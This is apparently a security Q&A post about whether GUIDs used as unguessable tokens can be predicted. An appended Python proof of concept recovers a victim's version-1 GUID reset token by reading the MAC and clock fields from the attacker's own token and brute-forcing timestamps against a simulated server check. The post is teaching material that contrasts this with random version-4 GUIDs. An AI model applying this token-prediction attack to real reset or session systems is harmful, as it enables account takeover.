I have been using GUIDs as un-guessable tokens in various situations for some time. I came across this question/answer which seems to suggest that while this is ok in some situations, it should not be done where security is a significant concern.

Typically when I am trying to understand a vulnerability, I will create an application on my test environment which reproduces the vulnerability and I can then exploit it to see how it works in the real world.

Can anyone point me to any resources that go over how a GUID that is being used as an un-guessable token could be guessed in a controlled environment?

Abe Miessler
  • This depends on how your application generates GUIDs, doesn't it? As one of the answers in the referenced question states, they were initially conceived to be *unique*, not *unpredictable*. So if you use e.g. last 3 MAC bytes XOR first 3 MAC bytes concatenated with your current system time in millisecs, it can easily be predicted. – Dmitry Janushkevich Jul 10 '14 at 16:55
  • Let's say it's using .NET's built in GUID structure, which I believe uses Version 4? – Abe Miessler Jul 10 '14 at 18:26
  • This may be relevant. http://stackoverflow.com/questions/643445/how-easily-can-you-guess-a-guid-that-might-be-generated – Andrew Hoffman Jul 10 '14 at 18:39

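As an added example, not part of the question, the comments, or the posts they link to: the Python script below reproduces in a controlled environment the weakness Dmitry describes, a GUID generator built from a MAC address and a timestamp (RFC 4122 version 1). The server node, clock sequence, timestamps, millisecond clock resolution and the `is_valid` oracle are all constructed assumptions for the demonstration, not values from any real system. Given one token of their own, the attacker reads the node and clock sequence straight out of it, then brute-forces the only field that still varies, the timestamp, over a plausible issuance window.

```python
import uuid

# Constructed for this example: the MAC address and 14-bit clock sequence that a
# hypothetical server's version-1 GUID generator embeds in every token it issues.
SERVER_NODE = 0x001122334455
SERVER_CLOCK_SEQ = 0x1ABC

# RFC 4122: 100-nanosecond ticks between 1582-10-15 and the Unix epoch.
GREGORIAN_OFFSET = 0x01B21DD213814000

# Assumption: the server reads its clock with millisecond resolution (the
# MAC-plus-milliseconds generator described in the comments), so one millisecond
# is 10_000 ticks and consecutive tokens differ only in that coarse field.
TICKS_PER_MS = 10_000


def v1_guid(unix_ms, clock_seq, node):
    """Build a version-1 GUID from a Unix millisecond timestamp, clock sequence and node.

    Same field layout as uuid.uuid1(); the timestamp is supplied by the caller
    so the example runs deterministically instead of reading the wall clock.
    """
    ticks = unix_ms * TICKS_PER_MS + GREGORIAN_OFFSET
    fields = (
        ticks & 0xFFFFFFFF,          # time_low
        (ticks >> 32) & 0xFFFF,      # time_mid
        (ticks >> 48) & 0x0FFF,      # time_hi; version nibble is set by UUID(version=1)
        (clock_seq >> 8) & 0x3F,     # clock_seq_hi; variant bits set by UUID(version=1)
        clock_seq & 0xFF,            # clock_seq_low
        node,                        # 48-bit MAC address
    )
    return uuid.UUID(fields=fields, version=1)


def leaked_fields(observed):
    """Everything a single legitimately obtained version-1 token tells an attacker."""
    unix_ms = (observed.time - GREGORIAN_OFFSET) // TICKS_PER_MS
    return {"node": observed.node, "clock_seq": observed.clock_seq, "unix_ms": unix_ms}


def guess_token(own_token, is_valid, window_ms):
    """Enumerate every token the server could have issued in the window_ms after the
    attacker's own token; return (token, offset_ms) for the first one the oracle
    accepts, or (None, None). is_valid stands in for the server's token check."""
    leak = leaked_fields(own_token)
    for offset in range(window_ms + 1):
        candidate = v1_guid(leak["unix_ms"] + offset, leak["clock_seq"], leak["node"])
        if is_valid(candidate):
            return candidate, offset
    return None, None


def random_token():
    """The generator to use instead: 122 bits from os.urandom, no fields to leak."""
    return uuid.uuid4()


def demo():
    """Constructed scenario: the attacker requests a reset token for their own account,
    the victim's token is issued 4.2 s later, and the server accepts any outstanding token."""
    t_attacker_ms = 1_405_011_400_000            # arbitrary constructed timestamp
    attacker_token = v1_guid(t_attacker_ms, SERVER_CLOCK_SEQ, SERVER_NODE)
    victim_token = v1_guid(t_attacker_ms + 4_200, SERVER_CLOCK_SEQ, SERVER_NODE)
    outstanding = {victim_token}                 # the server's store of live tokens
    found, offset = guess_token(attacker_token, lambda c: c in outstanding, window_ms=10_000)
    return found == victim_token, offset


if __name__ == "__main__":
    recovered, offset_ms = demo()
    print(f"victim token recovered: {recovered} (issued {offset_ms} ms after the attacker's)")
```

The search here is 10,001 candidates because of the assumed millisecond clock. Python's own `uuid.uuid1()` stamps 100 ns ticks, so the same 10 s window is 10^8 candidates: still trivial to enumerate offline, and feasible online wherever the server lets candidates be tested quickly. Running the same loop against `uuid.uuid4()` output gives the attacker no leaked node or clock sequence to start from and a 2^122 candidate space, which is the difference between "unique" and "unpredictable" that the comments draw.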